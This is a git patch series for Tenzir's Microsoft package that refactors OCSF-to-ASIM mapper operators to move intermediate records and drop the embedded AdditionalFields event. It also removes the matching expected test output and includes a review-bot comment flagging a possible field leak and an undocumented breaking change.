a/microsoft/tests/graph/ocsf/sign-ins.tql b/microsoft/tests/graph/ocsf/sign-ins.tql index c826a17..65d3fb8 100644 --- a/microsoft/tests/graph/ocsf/sign-ins.tql +++ b/microsoft/tests/graph/ocsf/sign-ins.tql @@ -2,8 +2,6 @@ from_file f"{env("TENZIR_INPUTS")}/graph/sign-ins.ndjson" { read_json } @name = "microsoft.graph.sign_in" -event = this -microsoft::ocsf::map event=event -this = event +microsoft::ocsf::map event=this ocsf::derive ocsf::cast 
From 26e5db741fcc44d1cb5d5f98f1488719ed5fd254 Mon Sep 17 00:00:00 2001 From: Matthias Vallentin Date: Thu, 11 Jun 2026 17:50:31 +0200 Subject: [PATCH 22/27] Move mapper intermediates into output Use move-based record construction when replacing mapper input with the final OCSF or ASIM event. This removes the separate cleanup drops for consumed intermediate namespaces. Assisted-by: GPT-5 (Codex) --- microsoft/operators/asim/ocsf/account_change.tql | 3 +-- microsoft/operators/asim/ocsf/authentication.tql | 3 +-- microsoft/operators/asim/ocsf/authorize_session.tql | 3 +-- microsoft/operators/asim/ocsf/compliance_finding.tql | 3 +-- microsoft/operators/asim/ocsf/detection_finding.tql | 3 +-- microsoft/operators/asim/ocsf/dhcp_activity.tql | 3 +-- microsoft/operators/asim/ocsf/dns_activity.tql | 3 +-- microsoft/operators/asim/ocsf/entity_management.tql | 3 +-- microsoft/operators/asim/ocsf/event_log_activity.tql | 3 +-- microsoft/operators/asim/ocsf/file_system_activity.tql | 3 +-- microsoft/operators/asim/ocsf/group_management.tql | 3 +-- microsoft/operators/asim/ocsf/http_activity.tql | 3 +-- microsoft/operators/asim/ocsf/network_activity.tql | 3 +-- microsoft/operators/asim/ocsf/process_activity.tql | 3 +-- microsoft/operators/asim/ocsf/scheduled_job_activity.tql | 3 +-- microsoft/operators/asim/ocsf/windows_service_activity.tql | 3 +-- microsoft/operators/graph/ocsf/map.tql | 3 +-- 17 files changed, 17 insertions(+), 34 deletions(-) diff --git a/microsoft/operators/asim/ocsf/account_change.tql b/microsoft/operators/asim/ocsf/account_change.tql index 0b7d201..72cde7e 100644 --- a/microsoft/operators/asim/ocsf/account_change.tql +++ b/microsoft/operators/asim/ocsf/account_change.tql @@ -51,5 +51,4 @@ asim.GroupIdType = "SID" if asim.GroupId?.starts_with("S-") == true asim.SrcIpAddr = ocsf.src_endpoint?.ip? asim.SrcHostname = ocsf.src_endpoint?.hostname? -$event = {...asim, AdditionalFields: ocsf} -drop ocsf?, asim? +$event = {...move asim, AdditionalFields: move ocsf} 
diff --git a/microsoft/operators/asim/ocsf/authentication.tql b/microsoft/operators/asim/ocsf/authentication.tql index aae1000..ae1689b 100644 --- a/microsoft/operators/asim/ocsf/authentication.tql +++ b/microsoft/operators/asim/ocsf/authentication.tql @@ -64,5 +64,4 @@ if ocsf.auth_factors? != null { asim.LogonMethod = ocsf.auth_factors[0]?.factor_type? } -$event = {...asim, AdditionalFields: ocsf} -drop ocsf?, asim? +$event = {...move asim, AdditionalFields: move ocsf} diff --git a/microsoft/operators/asim/ocsf/authorize_session.tql b/microsoft/operators/asim/ocsf/authorize_session.tql index ce2a78e..ea29d0f 100644 --- a/microsoft/operators/asim/ocsf/authorize_session.tql +++ b/microsoft/operators/asim/ocsf/authorize_session.tql @@ -61,5 +61,4 @@ if ocsf.auth_factors? != null { asim.LogonMethod = ocsf.auth_factors[0]?.factor_type? } -$event = {...asim, AdditionalFields: ocsf} -drop ocsf?, asim? +$event = {...move asim, AdditionalFields: move ocsf} diff --git a/microsoft/operators/asim/ocsf/compliance_finding.tql b/microsoft/operators/asim/ocsf/compliance_finding.tql index 4a0a5b0..d1c417c 100644 --- a/microsoft/operators/asim/ocsf/compliance_finding.tql +++ b/microsoft/operators/asim/ocsf/compliance_finding.tql @@ -46,5 +46,4 @@ match ocsf.verdict? { _ => {} } -$event = {...asim, AdditionalFields: ocsf} -drop ocsf?, asim? +$event = {...move asim, AdditionalFields: move ocsf} diff --git a/microsoft/operators/asim/ocsf/detection_finding.tql b/microsoft/operators/asim/ocsf/detection_finding.tql index b061cee..a3e8638 100644 --- a/microsoft/operators/asim/ocsf/detection_finding.tql +++ b/microsoft/operators/asim/ocsf/detection_finding.tql @@ -61,5 +61,4 @@ match ocsf.verdict? { _ => {} } -$event = {...asim, AdditionalFields: ocsf} -drop ocsf?, asim? +$event = {...move asim, AdditionalFields: move ocsf} diff --git a/microsoft/operators/asim/ocsf/dhcp_activity.tql b/microsoft/operators/asim/ocsf/dhcp_activity.tql index d785bc4..1792b44 100644 
--- a/microsoft/operators/asim/ocsf/dhcp_activity.tql +++ b/microsoft/operators/asim/ocsf/dhcp_activity.tql @@ -26,5 +26,4 @@ asim.SrcHostname = ocsf.src_endpoint?.hostname? else ocsf.src_endpoint?.ip?.stri asim.SrcIpAddr = ocsf.src_endpoint?.ip? asim.SrcMacAddr = ocsf.src_endpoint?.mac? -$event = {...asim, AdditionalFields: ocsf} -drop ocsf?, asim? +$event = {...move asim, AdditionalFields: move ocsf} diff --git a/microsoft/operators/asim/ocsf/dns_activity.tql b/microsoft/operators/asim/ocsf/dns_activity.tql index b523a92..bfb874d 100644 --- a/microsoft/operators/asim/ocsf/dns_activity.tql +++ b/microsoft/operators/asim/ocsf/dns_activity.tql @@ -31,5 +31,4 @@ asim.SrcHostname = ocsf.src_endpoint?.hostname? asim.DstIpAddr = ocsf.dst_endpoint?.ip? asim.DstHostname = ocsf.dst_endpoint?.hostname? -$event = {...asim, AdditionalFields: ocsf} -drop ocsf?, asim? +$event = {...move asim, AdditionalFields: move ocsf} diff --git a/microsoft/operators/asim/ocsf/entity_management.tql b/microsoft/operators/asim/ocsf/entity_management.tql index 4fb8972..f4aadfc 100644 --- a/microsoft/operators/asim/ocsf/entity_management.tql +++ b/microsoft/operators/asim/ocsf/entity_management.tql @@ -45,5 +45,4 @@ asim.SrcIpAddr = ocsf.src_endpoint?.ip? asim.TargetHostname = ocsf.dst_endpoint?.hostname? asim.TargetIpAddr = ocsf.dst_endpoint?.ip? -$event = {...asim, AdditionalFields: ocsf} -drop ocsf?, asim? +$event = {...move asim, AdditionalFields: move ocsf} diff --git a/microsoft/operators/asim/ocsf/event_log_activity.tql b/microsoft/operators/asim/ocsf/event_log_activity.tql index b2ed048..7698e69 100644 --- a/microsoft/operators/asim/ocsf/event_log_activity.tql +++ b/microsoft/operators/asim/ocsf/event_log_activity.tql @@ -45,5 +45,4 @@ asim.SrcIpAddr = ocsf.src_endpoint?.ip? asim.TargetHostname = ocsf.dst_endpoint?.hostname? asim.TargetIpAddr = ocsf.dst_endpoint?.ip? -$event = {...asim, AdditionalFields: ocsf} -drop ocsf?, asim? +$event = {...move asim, AdditionalFields: move ocsf} 
diff --git a/microsoft/operators/asim/ocsf/file_system_activity.tql b/microsoft/operators/asim/ocsf/file_system_activity.tql index 7a62c1a..69390a9 100644 --- a/microsoft/operators/asim/ocsf/file_system_activity.tql +++ b/microsoft/operators/asim/ocsf/file_system_activity.tql @@ -41,5 +41,4 @@ if ocsf.activity_name == "Rename" and ocsf.file_result? != null { } asim.TargetFilePathType = "Windows Local" if asim.TargetFilePath?.contains("\\") == true else "Unix Local" -$event = {...asim, AdditionalFields: ocsf} -drop ocsf?, asim? +$event = {...move asim, AdditionalFields: move ocsf} diff --git a/microsoft/operators/asim/ocsf/group_management.tql b/microsoft/operators/asim/ocsf/group_management.tql index 67b7eae..0f0c71e 100644 --- a/microsoft/operators/asim/ocsf/group_management.tql +++ b/microsoft/operators/asim/ocsf/group_management.tql @@ -47,5 +47,4 @@ asim.GroupIdType = "SID" if asim.GroupId?.starts_with("S-") == true asim.SrcIpAddr = ocsf.src_endpoint?.ip? asim.SrcHostname = ocsf.src_endpoint?.hostname? -$event = {...asim, AdditionalFields: ocsf} -drop ocsf?, asim? +$event = {...move asim, AdditionalFields: move ocsf} diff --git a/microsoft/operators/asim/ocsf/http_activity.tql b/microsoft/operators/asim/ocsf/http_activity.tql index c418c51..461ccc2 100644 --- a/microsoft/operators/asim/ocsf/http_activity.tql +++ b/microsoft/operators/asim/ocsf/http_activity.tql @@ -24,5 +24,4 @@ if ocsf.http_response?.code? != null { asim.EventResult = "Success" if ocsf.http_response.code < 400 else "Failure" } -$event = {...asim, AdditionalFields: ocsf} -drop ocsf?, asim? +$event = {...move asim, AdditionalFields: move ocsf} diff --git a/microsoft/operators/asim/ocsf/network_activity.tql b/microsoft/operators/asim/ocsf/network_activity.tql index 9174575..c6b23a6 100644 --- a/microsoft/operators/asim/ocsf/network_activity.tql +++ b/microsoft/operators/asim/ocsf/network_activity.tql 
@@ -39,5 +39,4 @@ match ocsf.disposition? { _ => {} } -$event = {...asim, AdditionalFields: ocsf} -drop ocsf?, asim? +$event = {...move asim, AdditionalFields: move ocsf} diff --git a/microsoft/operators/asim/ocsf/process_activity.tql b/microsoft/operators/asim/ocsf/process_activity.tql index 48212e1..fc0c6c9 100644 --- a/microsoft/operators/asim/ocsf/process_activity.tql +++ b/microsoft/operators/asim/ocsf/process_activity.tql @@ -35,5 +35,4 @@ asim.TargetProcessName = ocsf.process?.name? else ocsf.process?.file?.name? else asim.TargetProcessCommandLine = ocsf.process?.cmd_line? asim.TargetUserId = ocsf.user?.uid? -$event = {...asim, AdditionalFields: ocsf} -drop ocsf?, asim? +$event = {...move asim, AdditionalFields: move ocsf} diff --git a/microsoft/operators/asim/ocsf/scheduled_job_activity.tql b/microsoft/operators/asim/ocsf/scheduled_job_activity.tql index f77cdf2..387760e 100644 --- a/microsoft/operators/asim/ocsf/scheduled_job_activity.tql +++ b/microsoft/operators/asim/ocsf/scheduled_job_activity.tql @@ -45,5 +45,4 @@ asim.SrcIpAddr = ocsf.src_endpoint?.ip? asim.TargetHostname = ocsf.dst_endpoint?.hostname? asim.TargetIpAddr = ocsf.dst_endpoint?.ip? -$event = {...asim, AdditionalFields: ocsf} -drop ocsf?, asim? +$event = {...move asim, AdditionalFields: move ocsf} diff --git a/microsoft/operators/asim/ocsf/windows_service_activity.tql b/microsoft/operators/asim/ocsf/windows_service_activity.tql index 5cecccb..e765ef7 100644 --- a/microsoft/operators/asim/ocsf/windows_service_activity.tql +++ b/microsoft/operators/asim/ocsf/windows_service_activity.tql @@ -45,5 +45,4 @@ asim.SrcIpAddr = ocsf.src_endpoint?.ip? asim.TargetHostname = ocsf.dst_endpoint?.hostname? asim.TargetIpAddr = ocsf.dst_endpoint?.ip? -$event = {...asim, AdditionalFields: ocsf} -drop ocsf?, asim? +$event = {...move asim, AdditionalFields: move ocsf} diff --git a/microsoft/operators/graph/ocsf/map.tql b/microsoft/operators/graph/ocsf/map.tql index 1cb726f..58e34e7 100644 
--- a/microsoft/operators/graph/ocsf/map.tql +++ b/microsoft/operators/graph/ocsf/map.tql @@ -69,5 +69,4 @@ match @name { } } -$event = {...ocsf, unmapped: graph} -drop graph?, ocsf? +$event = {...move ocsf, unmapped: move graph} From 005a9ae76dee2a78564be0dddeb3bc381c36449f Mon Sep 17 00:00:00 2001 
From: Matthias Vallentin Date: Thu, 11 Jun 2026 18:34:03 +0200 Subject: [PATCH 23/27] Stop embedding OCSF events in ASIM output Emit only the mapped ASIM fields from OCSF-to-ASIM operators. Callers that need to retain the OCSF event can duplicate or copy it before invoking the ASIM mapper. Assisted-by: GPT-5 (Codex) --- .../unreleased/ocsf-to-asim-mapper.md | 3 +- .../operators/asim/ocsf/account_change.tql | 2 +- .../operators/asim/ocsf/authentication.tql | 2 +- .../operators/asim/ocsf/authorize_session.tql | 2 +- .../asim/ocsf/compliance_finding.tql | 2 +- .../operators/asim/ocsf/detection_finding.tql | 2 +- .../operators/asim/ocsf/dhcp_activity.tql | 2 +- .../operators/asim/ocsf/dns_activity.tql | 2 +- .../operators/asim/ocsf/entity_management.tql | 2 +- .../asim/ocsf/event_log_activity.tql | 2 +- .../asim/ocsf/file_system_activity.tql | 2 +- .../operators/asim/ocsf/group_management.tql | 2 +- .../operators/asim/ocsf/http_activity.tql | 2 +- .../operators/asim/ocsf/network_activity.tql | 2 +- .../operators/asim/ocsf/process_activity.tql | 2 +- .../asim/ocsf/scheduled_job_activity.tql | 2 +- .../asim/ocsf/windows_service_activity.tql | 2 +- microsoft/tests/asim/graph.txt | 90 ----------- microsoft/tests/asim/ocsf.txt | 32 ---- microsoft/tests/asim/ocsf/account_change.txt | 39 ----- microsoft/tests/asim/ocsf/authentication.txt | 153 ------------------ .../tests/asim/ocsf/detection_finding.txt | 58 ------- microsoft/tests/asim/ocsf/dhcp_activity.txt | 27 ---- microsoft/tests/asim/ocsf/dns_activity.txt | 31 ---- .../tests/asim/ocsf/event_log_activity.txt | 42 ----- .../tests/asim/ocsf/file_system_activity.txt | 66 -------- .../tests/asim/ocsf/group_management.txt | 43 ----- microsoft/tests/asim/ocsf/http_activity.txt | 31 ---- .../tests/asim/ocsf/network_activity.txt | 34 ---- .../tests/asim/ocsf/process_activity.txt | 58 ------- microsoft/tests/asim/windows.tql | 1 - microsoft/tests/asim/windows.txt | 99 ------------ 32 files changed, 17 insertions(+), 822 
deletions(-) diff --git a/microsoft/changelog/unreleased/ocsf-to-asim-mapper.md b/microsoft/changelog/unreleased/ocsf-to-asim-mapper.md index 68e1d23..cca3728 100644 --- a/microsoft/changelog/unreleased/ocsf-to-asim-mapper.md +++ b/microsoft/changelog/unreleased/ocsf-to-asim-mapper.md @@ -25,5 +25,4 @@ preserved in OCSF `raw_data` and `raw_data_size`. The mapper covers the Microsoft package's current OCSF authentication, process, audit, user-management, and alert outputs, plus direct OCSF counterparts for -file, network, DNS, DHCP, and web session ASIM schemas. The full original OCSF -event is preserved under `AdditionalFields` so no source data is lost. +file, network, DNS, DHCP, and web session ASIM schemas. diff --git a/microsoft/operators/asim/ocsf/account_change.tql b/microsoft/operators/asim/ocsf/account_change.tql index 72cde7e..d58c398 100644 --- a/microsoft/operators/asim/ocsf/account_change.tql +++ b/microsoft/operators/asim/ocsf/account_change.tql @@ -51,4 +51,4 @@ asim.GroupIdType = "SID" if asim.GroupId?.starts_with("S-") == true asim.SrcIpAddr = ocsf.src_endpoint?.ip? asim.SrcHostname = ocsf.src_endpoint?.hostname? -$event = {...move asim, AdditionalFields: move ocsf} +$event = move asim diff --git a/microsoft/operators/asim/ocsf/authentication.tql b/microsoft/operators/asim/ocsf/authentication.tql index ae1689b..dadfca1 100644 --- a/microsoft/operators/asim/ocsf/authentication.tql +++ b/microsoft/operators/asim/ocsf/authentication.tql @@ -64,4 +64,4 @@ if ocsf.auth_factors? != null { asim.LogonMethod = ocsf.auth_factors[0]?.factor_type? } -$event = {...move asim, AdditionalFields: move ocsf} +$event = move asim diff --git a/microsoft/operators/asim/ocsf/authorize_session.tql b/microsoft/operators/asim/ocsf/authorize_session.tql index ea29d0f..ac4537a 100644 --- a/microsoft/operators/asim/ocsf/authorize_session.tql +++ b/microsoft/operators/asim/ocsf/authorize_session.tql 
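Review bot: With `$event = move asim` the `ocsf` intermediate is no longer consumed, so when the operator is invoked with a nested `event=` path rather than `event=this`, the top-level `ocsf` field that the previous `move ocsf` (and before that `drop ocsf?`) removed now appears to survive into the output; the prologue that populates `ocsf` is outside the hunk, so this is inferred from the old lines. The same applies to every operator hunk in this commit (authentication, authorize_session, compliance_finding, detection_finding, dhcp_activity, dns_activity, entity_management, event_log_activity, file_system_activity, group_management, http_activity, network_activity, process_activity, scheduled_job_activity, windows_service_activity). If the operator contract is `event=this` only, state it above the assignment, e.g. `// ocsf is discarded here; callers that need the original event must copy it before invoking this operator`; otherwise keep an explicit `drop ocsf?` after the assignment so the intermediate never leaks into downstream ASIM consumers. The changelog hunk in the same commit removes the sentence about `AdditionalFields` without saying that the field itself is gone, so pipelines that relied on it get no notice of the breaking change; a sentence such as `The full OCSF event is no longer embedded under AdditionalFields; copy the event before calling the ASIM mapper if you need to retain it.` would cover that.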
@@ -61,4 +61,4 @@ if ocsf.auth_factors? != null { asim.LogonMethod = ocsf.auth_factors[0]?.factor_type? } -$event = {...move asim, AdditionalFields: move ocsf} +$event = move asim diff --git a/microsoft/operators/asim/ocsf/compliance_finding.tql b/microsoft/operators/asim/ocsf/compliance_finding.tql index d1c417c..c392f25 100644 --- a/microsoft/operators/asim/ocsf/compliance_finding.tql +++ b/microsoft/operators/asim/ocsf/compliance_finding.tql @@ -46,4 +46,4 @@ match ocsf.verdict? { _ => {} } -$event = {...move asim, AdditionalFields: move ocsf} +$event = move asim diff --git a/microsoft/operators/asim/ocsf/detection_finding.tql b/microsoft/operators/asim/ocsf/detection_finding.tql index a3e8638..4fc1a17 100644 --- a/microsoft/operators/asim/ocsf/detection_finding.tql +++ b/microsoft/operators/asim/ocsf/detection_finding.tql @@ -61,4 +61,4 @@ match ocsf.verdict? { _ => {} } -$event = {...move asim, AdditionalFields: move ocsf} +$event = move asim diff --git a/microsoft/operators/asim/ocsf/dhcp_activity.tql b/microsoft/operators/asim/ocsf/dhcp_activity.tql index 1792b44..5b8b90a 100644 --- a/microsoft/operators/asim/ocsf/dhcp_activity.tql +++ b/microsoft/operators/asim/ocsf/dhcp_activity.tql @@ -26,4 +26,4 @@ asim.SrcHostname = ocsf.src_endpoint?.hostname? else ocsf.src_endpoint?.ip?.stri asim.SrcIpAddr = ocsf.src_endpoint?.ip? asim.SrcMacAddr = ocsf.src_endpoint?.mac? -$event = {...move asim, AdditionalFields: move ocsf} +$event = move asim diff --git a/microsoft/operators/asim/ocsf/dns_activity.tql b/microsoft/operators/asim/ocsf/dns_activity.tql index bfb874d..b96d045 100644 --- a/microsoft/operators/asim/ocsf/dns_activity.tql +++ b/microsoft/operators/asim/ocsf/dns_activity.tql @@ -31,4 +31,4 @@ asim.SrcHostname = ocsf.src_endpoint?.hostname? asim.DstIpAddr = ocsf.dst_endpoint?.ip? asim.DstHostname = ocsf.dst_endpoint?.hostname? -$event = {...move asim, AdditionalFields: move ocsf} +$event = move asim 
diff --git a/microsoft/operators/asim/ocsf/entity_management.tql b/microsoft/operators/asim/ocsf/entity_management.tql index f4aadfc..01aae60 100644 --- a/microsoft/operators/asim/ocsf/entity_management.tql +++ b/microsoft/operators/asim/ocsf/entity_management.tql @@ -45,4 +45,4 @@ asim.SrcIpAddr = ocsf.src_endpoint?.ip? asim.TargetHostname = ocsf.dst_endpoint?.hostname? asim.TargetIpAddr = ocsf.dst_endpoint?.ip? -$event = {...move asim, AdditionalFields: move ocsf} +$event = move asim diff --git a/microsoft/operators/asim/ocsf/event_log_activity.tql b/microsoft/operators/asim/ocsf/event_log_activity.tql index 7698e69..cd93063 100644 --- a/microsoft/operators/asim/ocsf/event_log_activity.tql +++ b/microsoft/operators/asim/ocsf/event_log_activity.tql @@ -45,4 +45,4 @@ asim.SrcIpAddr = ocsf.src_endpoint?.ip? asim.TargetHostname = ocsf.dst_endpoint?.hostname? asim.TargetIpAddr = ocsf.dst_endpoint?.ip? -$event = {...move asim, AdditionalFields: move ocsf} +$event = move asim diff --git a/microsoft/operators/asim/ocsf/file_system_activity.tql b/microsoft/operators/asim/ocsf/file_system_activity.tql index 69390a9..198c644 100644 --- a/microsoft/operators/asim/ocsf/file_system_activity.tql +++ b/microsoft/operators/asim/ocsf/file_system_activity.tql @@ -41,4 +41,4 @@ if ocsf.activity_name == "Rename" and ocsf.file_result? != null { } asim.TargetFilePathType = "Windows Local" if asim.TargetFilePath?.contains("\\") == true else "Unix Local" -$event = {...move asim, AdditionalFields: move ocsf} +$event = move asim diff --git a/microsoft/operators/asim/ocsf/group_management.tql b/microsoft/operators/asim/ocsf/group_management.tql index 0f0c71e..696296e 100644 --- a/microsoft/operators/asim/ocsf/group_management.tql +++ b/microsoft/operators/asim/ocsf/group_management.tql 
@@ -47,4 +47,4 @@ asim.GroupIdType = "SID" if asim.GroupId?.starts_with("S-") == true asim.SrcIpAddr = ocsf.src_endpoint?.ip? asim.SrcHostname = ocsf.src_endpoint?.hostname? -$event = {...move asim, AdditionalFields: move ocsf} +$event = move asim diff --git a/microsoft/operators/asim/ocsf/http_activity.tql b/microsoft/operators/asim/ocsf/http_activity.tql index 461ccc2..a8bde76 100644 --- a/microsoft/operators/asim/ocsf/http_activity.tql +++ b/microsoft/operators/asim/ocsf/http_activity.tql @@ -24,4 +24,4 @@ if ocsf.http_response?.code? != null { asim.EventResult = "Success" if ocsf.http_response.code < 400 else "Failure" } -$event = {...move asim, AdditionalFields: move ocsf} +$event = move asim diff --git a/microsoft/operators/asim/ocsf/network_activity.tql b/microsoft/operators/asim/ocsf/network_activity.tql index c6b23a6..8bc833f 100644 --- a/microsoft/operators/asim/ocsf/network_activity.tql +++ b/microsoft/operators/asim/ocsf/network_activity.tql @@ -39,4 +39,4 @@ match ocsf.disposition? { _ => {} } -$event = {...move asim, AdditionalFields: move ocsf} +$event = move asim diff --git a/microsoft/operators/asim/ocsf/process_activity.tql b/microsoft/operators/asim/ocsf/process_activity.tql index fc0c6c9..8294f0a 100644 --- a/microsoft/operators/asim/ocsf/process_activity.tql +++ b/microsoft/operators/asim/ocsf/process_activity.tql @@ -35,4 +35,4 @@ asim.TargetProcessName = ocsf.process?.name? else ocsf.process?.file?.name? else asim.TargetProcessCommandLine = ocsf.process?.cmd_line? asim.TargetUserId = ocsf.user?.uid? -$event = {...move asim, AdditionalFields: move ocsf} +$event = move asim diff --git a/microsoft/operators/asim/ocsf/scheduled_job_activity.tql b/microsoft/operators/asim/ocsf/scheduled_job_activity.tql index 387760e..731782f 100644 --- a/microsoft/operators/asim/ocsf/scheduled_job_activity.tql +++ b/microsoft/operators/asim/ocsf/scheduled_job_activity.tql 
@@ -45,4 +45,4 @@ asim.SrcIpAddr = ocsf.src_endpoint?.ip?
 asim.TargetHostname = ocsf.dst_endpoint?.hostname?
 asim.TargetIpAddr = ocsf.dst_endpoint?.ip?
-$event = {...move asim, AdditionalFields: move ocsf}
+$event = move asim
diff --git a/microsoft/operators/asim/ocsf/windows_service_activity.tql b/microsoft/operators/asim/ocsf/windows_service_activity.tql
index e765ef7..6c02cd3 100644
--- a/microsoft/operators/asim/ocsf/windows_service_activity.tql
+++ b/microsoft/operators/asim/ocsf/windows_service_activity.tql
@@ -45,4 +45,4 @@ asim.SrcIpAddr = ocsf.src_endpoint?.ip?
 asim.TargetHostname = ocsf.dst_endpoint?.hostname?
 asim.TargetIpAddr = ocsf.dst_endpoint?.ip?
-$event = {...move asim, AdditionalFields: move ocsf}
+$event = move asim
diff --git a/microsoft/tests/asim/graph.txt b/microsoft/tests/asim/graph.txt
index 1ac2942..9d435e0 100644
--- a/microsoft/tests/asim/graph.txt
+++ b/microsoft/tests/asim/graph.txt
@@ -36,95 +36,5 @@ TargetAppName: "Office 365", LogonProtocol: null, LogonMethod: "Push Notification", - AdditionalFields: { - action: "Allowed", - action_id: 1, - activity_id: 1, - activity_name: "Logon", - actor: { - user: { - domain: "example.com", - email_addr: "alice@example.com", - full_name: "Alice Example", - name: "alice", - type: "User", - type_id: 1, - uid: "user-1", - }, - }, - auth_factors: [ - { - factor_type: "Push Notification", - factor_type_id: 5, - }, - ], - category_name: "Identity & Access Management", - category_uid: 3, - class_name: "Authentication", - class_uid: 3002, - cloud: { - provider: "Azure", - }, - disposition: "Allowed", - disposition_id: 1, - dst_endpoint: { - svc_name: "Microsoft Graph", - uid: "resource-1", - }, - is_mfa: true, - is_remote: true, - logon_type: "interactiveUser", - logon_type_id: 99, - metadata: { - log_name: "auditLogs/signIns", - original_event_uid: "sign-in-1", - product: { - feature: { - name: "Microsoft Graph", - }, - name: "Microsoft Entra ID", - vendor_name: "Microsoft", - }, - profiles: [ - "cloud", - "security_control", - ], - version: "1.8.0", - }, - service: { - name: "Office 365", - uid: "app-1", - }, - severity: "Informational", - severity_id: 1, - src_endpoint: { - ip: 203.0.113.10, - location: { - city: "Berlin", - country: "DE", - }, - os: { - name: "Windows 11", - }, - uid: "device-1", - }, - status: "Success", - status_code: "0", - status_detail: "Other.", - status_id: 1, - time: 2026-05-01T10:00:00Z, - type_name: "Authentication: Logon", - type_uid: 300201, - unmapped: null, - user: { - domain: "example.com", - email_addr: "alice@example.com", - full_name: "Alice Example", - name: "alice", - type: "User", - type_id: 1, - uid: "user-1", - }, - }, name: "asim.authentication", } diff --git a/microsoft/tests/asim/ocsf.txt b/microsoft/tests/asim/ocsf.txt index 5670818..63ed92b 100644 --- a/microsoft/tests/asim/ocsf.txt +++ b/microsoft/tests/asim/ocsf.txt 
@@ -24,37 +24,5 @@ SrcHostname: null, DstIpAddr: null, DstHostname: null, - AdditionalFields: { - activity_id: 1, - activity_name: "Query", - category_uid: 4, - class_uid: 4003, - class_name: "DNS Activity", - type_uid: 400301, - type_name: "DNS Activity: Query", - time: 2026-01-01T00:00:02Z, - severity_id: 1, - status: "Success", - rcode: "NA", - metadata: { - original_event_uid: "dns-1", - product: { - name: "DNS", - vendor_name: "Microsoft", - }, - version: "1.8.0", - }, - device: { - hostname: "dns1", - }, - query: { - hostname: "example.org", - type: "A", - class: "IN", - }, - src_endpoint: { - ip: 10.0.0.1, - }, - }, name: "asim.dns", } diff --git a/microsoft/tests/asim/ocsf/account_change.txt b/microsoft/tests/asim/ocsf/account_change.txt index c1220d0..93f39fa 100644 --- a/microsoft/tests/asim/ocsf/account_change.txt +++ b/microsoft/tests/asim/ocsf/account_change.txt @@ -28,44 +28,5 @@ GroupIdType: null, SrcIpAddr: null, SrcHostname: null, - AdditionalFields: { - activity_id: 1, - activity_name: "Create", - category_uid: 3, - category_name: "Identity & Access Management", - class_uid: 3001, - class_name: "Account Change", - type_uid: 300101, - type_name: "Account Change: Create", - time: 2024-03-23T12:34:56.789012300Z, - severity_id: 1, - metadata: { - event_code: "4720", - original_event_uid: "98767", - product: { - name: "Microsoft-Windows-Security-Auditing", - vendor_name: "Microsoft", - }, - profiles: [ - "host", - ], - version: "1.8.0", - }, - device: { - hostname: "DC01.corp.local", - }, - actor: { - user: { - domain: "CORP", - name: "jdoe", - uid: "S-1-5-21-3107921522-2185401913-891411500-1104", - }, - }, - user: { - domain: "CORP", - name: "backdoor_svc", - uid: "S-1-5-21-3107921522-2185401913-891411500-1500", - }, - }, name: "asim.user_management", } diff --git a/microsoft/tests/asim/ocsf/authentication.txt b/microsoft/tests/asim/ocsf/authentication.txt index 49d599f..c70b478 100644 --- a/microsoft/tests/asim/ocsf/authentication.txt 
+++ b/microsoft/tests/asim/ocsf/authentication.txt @@ -35,56 +35,6 @@ TargetAppId: null, TargetAppName: null, LogonProtocol: "Kerberos", - AdditionalFields: { - activity_id: 1, - activity_name: "Logon", - category_uid: 3, - category_name: "Identity & Access Management", - class_uid: 3002, - class_name: "Authentication", - type_uid: 300201, - type_name: "Authentication: Logon", - time: 2024-03-23T12:34:56.789012300Z, - severity_id: 1, - severity: "Informational", - status_id: 1, - status: "Success", - auth_protocol: "Kerberos", - logon_type: "Network", - logon_type_id: 3, - metadata: { - event_code: "4624", - original_event_uid: "98761", - product: { - name: "Microsoft-Windows-Security-Auditing", - vendor_name: "Microsoft", - }, - profiles: [ - "host", - ], - version: "1.8.0", - }, - device: { - hostname: "DC01.corp.local", - }, - src_endpoint: { - ip: 10.0.0.42, - port: 49827, - }, - actor: { - user: { - uid: "S-1-0-0", - }, - session: { - uid_alt: "0x0", - }, - }, - user: { - domain: "CORP", - name: "jdoe", - uid: "S-1-5-21-3107921522-2185401913-891411500-1104", - }, - }, name: "asim.authentication", } { @@ -122,41 +72,6 @@ TargetAppId: null, TargetAppName: null, LogonProtocol: null, - AdditionalFields: { - activity_id: 2, - activity_name: "Logoff", - category_uid: 3, - category_name: "Identity & Access Management", - class_uid: 3002, - class_name: "Authentication", - type_uid: 300202, - type_name: "Authentication: Logoff", - time: 2024-03-23T12:45:00Z, - severity_id: 1, - severity: "Informational", - status_id: 1, - status: "Success", - metadata: { - event_code: "4634", - original_event_uid: "98762", - product: { - name: "Microsoft-Windows-Security-Auditing", - vendor_name: "Microsoft", - }, - profiles: [ - "host", - ], - version: "1.8.0", - }, - device: { - hostname: "DC01.corp.local", - }, - user: { - domain: "CORP", - name: "jdoe", - uid: "S-1-5-21-3107921522-2185401913-891411500-1104", - }, - }, name: "asim.authentication", } { 
@@ -194,73 +109,5 @@ TargetAppName: "Office 365", LogonProtocol: null, LogonMethod: "Push Notification", - AdditionalFields: { - activity_id: 1, - activity_name: "Logon", - category_uid: 3, - category_name: "Identity & Access Management", - class_uid: 3002, - class_name: "Authentication", - type_uid: 300201, - type_name: "Authentication: Logon", - time: 2026-05-01T10:00:00Z, - severity_id: 1, - severity: "Informational", - status_id: 1, - status: "Success", - metadata: { - log_name: "auditLogs/signIns", - original_event_uid: "sign-in-1", - product: { - name: "Microsoft Entra ID", - vendor_name: "Microsoft", - feature: { - name: "Microsoft Graph", - }, - }, - profiles: [ - "cloud", - "security_control", - ], - version: "1.8.0", - }, - cloud: { - provider: "Azure", - }, - actor: { - user: { - domain: "example.com", - email_addr: "alice@example.com", - full_name: "Alice Example", - name: "alice", - uid: "user-1", - }, - }, - user: { - domain: "example.com", - email_addr: "alice@example.com", - full_name: "Alice Example", - name: "alice", - uid: "user-1", - }, - src_endpoint: { - ip: 203.0.113.10, - uid: "device-1", - }, - dst_endpoint: { - svc_name: "Microsoft Graph", - uid: "resource-1", - }, - service: { - name: "Office 365", - uid: "app-1", - }, - auth_factors: [ - { - factor_type: "Push Notification", - factor_type_id: 5, - }, - ], - }, name: "asim.authentication", } diff --git a/microsoft/tests/asim/ocsf/detection_finding.txt b/microsoft/tests/asim/ocsf/detection_finding.txt index cdcba4e..88b18f2 100644 --- a/microsoft/tests/asim/ocsf/detection_finding.txt +++ b/microsoft/tests/asim/ocsf/detection_finding.txt 
